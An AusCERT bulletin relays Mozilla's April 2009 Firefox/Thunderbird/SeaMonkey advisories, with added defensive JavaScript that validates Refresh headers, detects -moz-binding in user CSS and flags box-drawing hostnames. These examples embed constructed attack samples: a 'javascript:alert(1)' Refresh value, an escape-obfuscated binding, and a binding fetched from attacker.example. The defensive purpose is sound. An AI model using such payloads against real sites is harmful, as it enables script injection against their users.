Date: 23 April 2009
References: ESB-2009.0391 ESB-2009.0454
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
A U S C E R T A L E R T
AL-2009.0035 -- AUSCERT ALERT
[Win][UNIX/Linux]
Firefox, Seamonkey and Thunderbird: Execute Arbitrary Code
23 April 2009
===========================================================================
AusCERT Alert Summary
---------------------
Product: Firefox 3.0.8
Thunderbird 2.0.0.21
Seamonkey 1.1.16
Operating System: UNIX variants (UNIX, Linux, OSX)
Windows
Impact: Execute Arbitrary Code/Commands
Access Privileged Data
Create Arbitrary Files
Cross-site Scripting
Cross-site Request Forgery
Provide Misleading Information
Access: Remote/Unauthenticated
CVE Names: CVE-2009-1302 CVE-2009-1303 CVE-2009-1304
CVE-2009-1305 CVE-2009-1306 CVE-2009-1307
CVE-2009-1308 CVE-2009-1309 CVE-2009-1310
CVE-2009-1311 CVE-2009-1312
Member content until: Thursday, May 21 2009
- --------------------------BEGIN INCLUDED TEXT--------------------
OVERVIEW:
Mozilla has released nine advisories relating to Firefox, Thunderbird
and Seamonkey. Mozilla has rated one of these advisories as "Critical",
two as "High", two as "Moderate" and four as "Low" impact.
IMPACT:
According to Mozilla, the vulnerabilities corrected in this update
are:
o MFSA 2009-22 (CVE-2009-1312): "Mozilla community member Michael
reported that when a server responds with a Refresh header
containing a javascript: URI, Firefox will redirect to the
javascript: URI. If an attacker could inject a Refresh header into a
server response, or could control the value that a site places in
the Refresh header, they could use this vulnerability to perform an
XSS attack and execute arbitrary JavaScript within the context of
that site." [1]
o MFSA 2009-21 (CVE-2009-1311): "Developer and Mozilla community member
Paolo Amadini reported that when saving the inner frame of a web
page as a file when the outer page has POST data associated with it,
the POST data will be incorrectly sent to the URL of the inner frame.
This could potentially result in a user's sensitive data being sent
to a site for which it was not intended." [2]
o MFSA 2009-20 (CVE-2009-1310): "Security researcher Prateek Saxena
reported that a malicious MozSearch plugin could be created using a
javascript: URI in the SearchForm value. This URI is used as the
default landing page when an empty search is performed. If an
attacker could get a user to install the malicious plugin and
perform an empty search, the SearchForm javascript: URI would be
executed within the context of the currently open page." [3]
o MFSA 2009-19 (CVE-2009-1309): "Mozilla security researcher
moz_bug_r_a4 reported that it is possible to create a document whose
URI does not match the document's principal using XMLHttpRequest.
This type of mismatch leads to incorrect results in principal-based
security checks. An attacker could use this vulnerability to execute
arbitrary JavaScript within the context of another site.
moz_bug_r_a4 separately reported that
XPCNativeWrapper.toString's __proto__ comes from the wrong scope
which results in calls to that function being executed in the wrong
context in certain circumstances. An attacker could use this
vulnerability to run arbitrary code within the context of a
different site. Alternatively, if chrome were to call
content.toString.call(), then attacker-defined functions could be
run with chrome privileges.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail." [4]
o MFSA 2009-18 (CVE-2009-1308): "Web developer Cefn Hoile reported that
sites which allow users to embed third-party stylesheets are
vulnerable to script injection attacks using XBL bindings. While
this behavior was documented previously, it was determined that this
particular risk was not well-understood by some websites. To
mitigate this risk Mozilla added a restriction that requires XBL
bindings to come from the same origin as the bound document.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail." [5]
o MFSA 2009-17 (CVE-2009-1307): "Security researcher Gregory Fleischer
reported that when an Adobe Flash file is loaded via the
view-source: scheme, the Flash plugin misinterprets the origin of
the content as localhost, leading to two specific vulnerabilities:
1. The Flash file can bypass restrictions imposed by the
crossdomain.xml mechanism and initiate HTTP requests to arbitrary
third-party sites. This vulnerability could be used by an
attacker to perform CSRF attacks against these sites.
2. The Flash file, being treated as a local resource, can read and
write Local Shared Objects on a user's machine. This
vulnerability could be used by an attacker to place cookie-like
objects on a user's computer and track them across multiple sites.
Additionally, Fleischer reported that the jar: protocol could be used
to bypass restrictions normally preventing content loaded via
view-source: from being rendered.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if plugins were to be enabled in mail. This is
not the default setting and we strongly discourage users from
enabling plugins in mail." [6]
o MFSA 2009-16 (CVE-2009-1306): "Mozilla developer Daniel Veditz
reported that when the jar: scheme is used to wrap a URI which
serves the content with Content-Disposition: attachment, the HTTP
header is ignored and the content is unpacked and displayed inline.
A site may depend on this HTTP header to prevent potentially
untrusted content that it serves from executing within the context
of the site. An attacker could use this vulnerability to subvert
sites using this mechanism to mitigate content injection attacks.
This vulnerability has not been fixed on the Mozilla 1.8.1 branch,
which is used to build Firefox 2 and Thunderbird 2. However, note
that there are several mitigating factors which prevent easy
exploitation of this issue. In order for a website to be exploitable
it must:
1. Allow users to upload arbitrary content
2. Allow users to set arbitrary MIME types, or specifically
serve .jar files as application/java-archive or application/x-jar
3. Serve the .jar files from a domain containing sensitive content
which would otherwise be protected using
Content-Disposition: attachment" [7]
o MFSA 2009-15 (CVE-2009-0652): "Security researcher Moxie Marlinspike
reported that Unicode box drawing characters were allowed in
Internationalized Domain Names (IDN) where they could be visually
confused with punctuation used in valid web addresses. This could be
combined with a phishing-type scam to trick a victim into thinking
they were on a different website than they actually were." [8]
o MFSA 2009-14 (CVE-2009-1302,CVE-2009-1303,CVE-2009-1304,
CVE-2009-1305):
"Mozilla developers identified and fixed several stability bugs in
the browser engine used in Firefox and other Mozilla-based products.
Some of these crashes showed evidence of memory corruption under
certain circumstances and we presume that with enough effort at
least some of these could be exploited to run arbitrary code.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail. Without further investigation
we cannot rule out the possibility that for some of these an
attacker might be able to prepare memory for exploitation
through some means other than JavaScript such as large images.
Workaround
Disable JavaScript until a version containing these fixes can be
installed." [9]
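The browser update is the real fix for MFSA 2009-22, but the advisory also
names the case where a site lets a user-controlled value reach its own
Refresh header. The following is an added server-side guard for that case;
it is not code from AusCERT or Mozilla. It parses the loose Refresh grammar
browsers accept ("<seconds>", "<seconds>; url=<target>" with URL= in any
case and optional quotes, or "<seconds>; <target>"), resolves the target the
way the browser would (control characters such as tab are dropped, so
"java<TAB>script:" is still javascript:), and only passes http: and https:.
Function names and the example page URL are this example's own.

```javascript
// Added example (not part of the AusCERT alert or the Mozilla advisories):
// server-side validation of a Refresh header so that an attacker-controlled
// target can never become a javascript: navigation (the MFSA 2009-22 case).

const SAFE_SCHEMES = new Set(["http:", "https:"]);

// Browsers discard ASCII control characters (tab, CR, LF, ...) while parsing
// a URL, so "java\tscript:" still runs. Strip them first so the scheme check
// sees what the browser will see.
function stripControls(s) {
  return s.replace(/[\u0000-\u001F\u007F]/g, "");
}

// Split a Refresh header value into { seconds, target }. target is null for a
// plain "<seconds>" reload. Returns null when the value is not even
// grammatical.
function parseRefresh(headerValue) {
  const m = /^\s*(\d+)\s*(?:[;,]\s*(?:url\s*=\s*)?(.*))?$/i.exec(headerValue);
  if (!m) return null;
  let target = m[2] === undefined ? null : m[2].trim();
  if (target !== null && target.length >= 2) {
    // Drop one layer of matching quotes, as browsers do.
    const q = target[0];
    if ((q === '"' || q === "'") && target[target.length - 1] === q) {
      target = target.slice(1, -1).trim();
    }
  }
  return { seconds: Number(m[1]), target };
}

// Scheme the browser would navigate to once the target is resolved against
// the page carrying the header; null when the target cannot be parsed.
function resolvedScheme(target, pageUrl) {
  try {
    return new URL(stripControls(target), pageUrl).protocol;
  } catch (e) {
    return null;
  }
}

// True only when the header is well-formed and any navigation it causes
// stays on http(s). An empty or absent target is a reload of the same page.
function isSafeRefresh(headerValue, pageUrl) {
  const parsed = parseRefresh(headerValue);
  if (parsed === null) return false;
  if (parsed.target === null || parsed.target === "") return true;
  return SAFE_SCHEMES.has(resolvedScheme(parsed.target, pageUrl));
}

// Build the header value from an untrusted target, refusing anything the
// allow-list rejects. The parsed URL is re-serialised so stray quotes or
// separators from the input cannot survive into the header.
function buildRefreshHeader(seconds, untrustedTarget, pageUrl) {
  const scheme = resolvedScheme(untrustedTarget, pageUrl);
  if (!SAFE_SCHEMES.has(scheme)) {
    throw new Error("refused Refresh target with scheme " + scheme);
  }
  const clean = new URL(stripControls(untrustedTarget), pageUrl).href;
  return `${Math.max(0, Math.floor(seconds))}; url=${clean}`;
}

// Constructed sample: the value an attacker would try to get the site to emit.
console.log(isSafeRefresh("5; url=javascript:alert(1)", "https://example.com/"));
console.log(buildRefreshHeader(5, "/next?x=1", "https://example.com/app/"));
```

The scheme allow-list stops script execution in the site's context, which
is what MFSA 2009-22 is about; it does not by itself stop an open redirect
to another http(s) host, so a site that needs same-origin targets should add
a host check on the resolved URL as well.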
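MFSA 2009-18 concerns sites that let users supply stylesheets. XBL bindings
are attached from CSS through the -moz-binding property (a fact about Gecko,
not stated in the advisory text above), so such a site can refuse any
user stylesheet that sets it. The check below is an added example, not code
from AusCERT or Mozilla; it removes CSS comments and decodes CSS character
escapes first, because "-moz-bind\69ng" is the same property name to the
browser as "-moz-binding". Function names and the sample stylesheets are
this example's own.

```javascript
// Added example (not part of the AusCERT alert or MFSA 2009-18): reject
// user-supplied CSS that sets -moz-binding, the property through which XBL
// bindings are attached, after normalising comments and escapes.

// Decode CSS escapes ("\62" -> "b", "\:" -> ":") and remove comments so an
// obfuscated spelling normalises to the property name the browser will see.
function normalizeCss(css) {
  const withoutComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  return withoutComments.replace(
    /\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([\s\S])/g,
    (match, hex, literal) => {
      if (hex !== undefined) {
        const cp = parseInt(hex, 16);
        // CSS maps NUL and out-of-range escapes to U+FFFD.
        return cp === 0 || cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
      }
      return literal;
    }
  );
}

// "-moz-binding" as a whole property name followed by ":"; the value runs to
// the next ";" or "}".
const MOZ_BINDING_DECL =
  /(?:^|[^A-Za-z0-9_-])-moz-binding[ \t\n\r\f]*:[ \t\n\r\f]*([^;}]*)/gi;

// Return the value of every -moz-binding declaration found after
// normalisation, so a reviewer can see what the stylesheet tried to bind.
function findXblBindings(css) {
  const normalized = normalizeCss(css);
  const values = [];
  for (const m of normalized.matchAll(MOZ_BINDING_DECL)) {
    values.push(m[1].trim());
  }
  return values;
}

// Gate for an upload handler: true means the stylesheet must be refused.
function referencesXblBinding(css) {
  return findXblBindings(css).length > 0;
}

// Constructed samples: a plain binding, an escape-obfuscated one, and a
// harmless stylesheet that merely mentions the word in a file name.
const SAMPLES = [
  '.box { color: red; -moz-binding: url("http://attacker.example/xbl.xml#run"); }',
  ".box { -moz-b\\69 nding:url(x.xml#b) }",
  ".safe { color: red; background: url(moz-binding.png) }",
];
for (const css of SAMPLES) {
  console.log(referencesXblBinding(css), findXblBindings(css));
}
```

The match is deliberately conservative: the property name inside a quoted
string value would also trigger a refusal, which is the right failure mode
for user-supplied CSS. A stylesheet that pulls in further sheets with
@import can carry the binding out of sight of this check, so an upload
handler should apply it to anything imported as well, or refuse @import.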
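MFSA 2009-15 describes Unicode box-drawing characters in a hostname being
mistaken for address punctuation. A detector for such names has to look at
the name as it would be displayed, which in proxy logs and mail headers is
often the ASCII-compatible "xn--" form, so the added example below decodes
punycode labels (RFC 3492) before scanning for code points in the Box
Drawing block, U+2500 to U+257F. It takes the host from the raw URL string
rather than from a URL parser so that nothing normalises the name before it
is inspected. This is not code from AusCERT or Mozilla; the sample hostnames
are constructed and the function names are this example's own.

```javascript
// Added example (not part of the AusCERT alert or MFSA 2009-15): flag
// hostname labels containing Unicode Box Drawing characters, decoding
// punycode ("xn--") labels first so the check also works on logged names.

const BOX_DRAWING = /[\u2500-\u257F]/;

// RFC 3492 parameters.
const BASE = 36, TMIN = 1, TMAX = 26, SKEW = 38, DAMP = 700;
const INITIAL_BIAS = 72, INITIAL_N = 128;

function digitValue(code) {
  if (code >= 48 && code <= 57) return code - 22;   // '0'..'9' -> 26..35
  if (code >= 65 && code <= 90) return code - 65;   // 'A'..'Z' -> 0..25
  if (code >= 97 && code <= 122) return code - 97;  // 'a'..'z' -> 0..25
  throw new RangeError("invalid punycode digit");
}

function adapt(delta, numPoints, firstTime) {
  delta = firstTime ? Math.floor(delta / DAMP) : Math.floor(delta / 2);
  delta += Math.floor(delta / numPoints);
  let k = 0;
  while (delta > ((BASE - TMIN) * TMAX) / 2) {
    delta = Math.floor(delta / (BASE - TMIN));
    k += BASE;
  }
  return k + Math.floor(((BASE - TMIN + 1) * delta) / (delta + SKEW));
}

// Decode one punycode label (the part after "xn--") to its Unicode form.
function punycodeDecode(input) {
  const output = [];
  let n = INITIAL_N, i = 0, bias = INITIAL_BIAS;
  const basic = input.lastIndexOf("-");
  for (let j = 0; j < basic; j++) {
    const c = input.charCodeAt(j);
    if (c >= 0x80) throw new RangeError("non-ASCII in basic part");
    output.push(c);
  }
  let pos = basic >= 0 ? basic + 1 : 0;
  while (pos < input.length) {
    const oldI = i;
    let w = 1;
    for (let k = BASE; ; k += BASE) {
      if (pos >= input.length) throw new RangeError("truncated punycode");
      const digit = digitValue(input.charCodeAt(pos++));
      i += digit * w;
      const t = k <= bias ? TMIN : k >= bias + TMAX ? TMAX : k - bias;
      if (digit < t) break;
      w *= BASE - t;
    }
    const len = output.length + 1;
    bias = adapt(i - oldI, len, oldI === 0);
    n += Math.floor(i / len);
    i %= len;
    if (n > 0x10ffff) throw new RangeError("code point out of range");
    output.splice(i, 0, n);
    i++;
  }
  return String.fromCodePoint(...output);
}

// Pull the host out of a URL string with no IDNA processing applied.
function rawHost(urlString) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/(?:[^/?#@]*@)?([^/?#:]+)/i.exec(urlString);
  return m ? m[1] : null;
}

// One finding per label that contains a box-drawing character, or that has
// an xn-- prefix which does not decode.
function findConfusableLabels(urlString) {
  const host = rawHost(urlString);
  if (host === null) return [];
  const findings = [];
  for (const label of host.split(".")) {
    let shown = label;
    if (/^xn--/i.test(label)) {
      try {
        shown = punycodeDecode(label.slice(4));
      } catch (e) {
        findings.push({ label, decoded: null, reason: "undecodable punycode" });
        continue;
      }
    }
    for (const ch of shown) {
      if (BOX_DRAWING.test(ch)) {
        const hex = ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0");
        findings.push({ label, decoded: shown, reason: "box-drawing U+" + hex });
        break;
      }
    }
  }
  return findings;
}

// Constructed sample: U+2571 looks like "/" so the host reads as a path.
console.log(findConfusableLabels("https://www.example.com\u2571login.evil.example/"));
```

A raw Unicode URL and its "xn--" encoding produce the same finding, which
is what a log scanner needs; labels whose punycode does not decode are
reported too rather than silently passed.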
MITIGATION:
These vulnerabilities have been fixed in Firefox 3.0.9, Thunderbird
2.0.0.22 and SeaMonkey 1.1.17. At the time of this publication the
Thunderbird and SeaMonkey updates have not yet been released; however,
Firefox 3.0.9 can be downloaded from the Mozilla web site.
REFERENCES:
[1] Mozilla Foundation Security Advisory 2009-22
http://www.mozilla.org/security/announce/2009/mfsa2009-22.html
[2] Mozilla Foundation Security Advisory 2009-21
http://www.mozilla.org/security/announce/2009/mfsa2009-21.html
[3] Mozilla Foundation Security Advisory 2009-20
http://www.mozilla.org/security/announce/2009/mfsa2009-20.html
[4] Mozilla Foundation Security Advisory 2009-19
http://www.mozilla.org/security/announce/2009/mfsa2009-19.html
[5] Mozilla Foundation Security Advisory 2009-18
http://www.mozilla.org/security/announce/2009/mfsa2009-18.html
[6] Mozilla Foundation Security Advisory 2009-17
http://www.mozilla.org/security/announce/2009/mfsa2009-17.html
[7] Mozilla Foundation Security Advisory 2009-16
http://www.mozilla.org/security/announce/2009/mfsa2009-16.html
[8] Mozilla Foundation Security Advisory 2009-15
http://www.mozilla.org/security/announce/2009/mfsa2009-15.html
[9] Mozilla Foundation Security Advisory 2009-14
http://www.mozilla.org/security/announce/2009/mfsa2009-14.html
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:
http://www.auscert.org.au/render.html?it=3192
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iD8DBQFJ78U0NVH5XJJInbgRAkU8AJ9Ki0pbxbjKeoiwe6O4wTJsh+aPkgCfellK
w8j4jptdrGKJzxrOG0U+eS4=
=u0Sl
-----END PGP SIGNATURE-----